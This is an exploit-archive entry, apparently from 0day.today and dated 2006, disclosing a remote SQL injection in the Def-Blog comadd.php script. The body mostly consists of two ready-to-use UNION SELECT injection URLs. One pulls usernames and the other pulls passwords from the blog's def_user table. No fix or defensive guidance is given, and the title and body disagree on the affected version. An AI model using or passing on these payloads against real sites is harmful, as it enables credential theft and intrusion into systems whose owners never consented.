id: 1003
date: 10/14/2006
title: Def-Blog <= 1.0.3 (comadd.php) Remote SQL Injection Vulnerability
author: SHiKaA
cves: 

=================================================================
Def-Blog <= 1.0.3 (comadd.php) Remote SQL Injection Vulnerability
=================================================================



#==============================================================================================
#Def-Blog <= v1.0.1 (article) Remote SQL Injection Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                            
#                                                                     
#Version : v1.0.1                                                                                                 
#
#Exploit :
#--------------------------------
#
#FOR USER : comadd.php?article=-1%20union%20select%20null,pseudo%20from%20def_user
#FOR PASS : comadd.php?article=-1%20union%20select%20null,mdp%20from%20def_user
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : Coder-AZH@CKTEAM
==================================================================================================


#  0day.today [2023-03-23]  #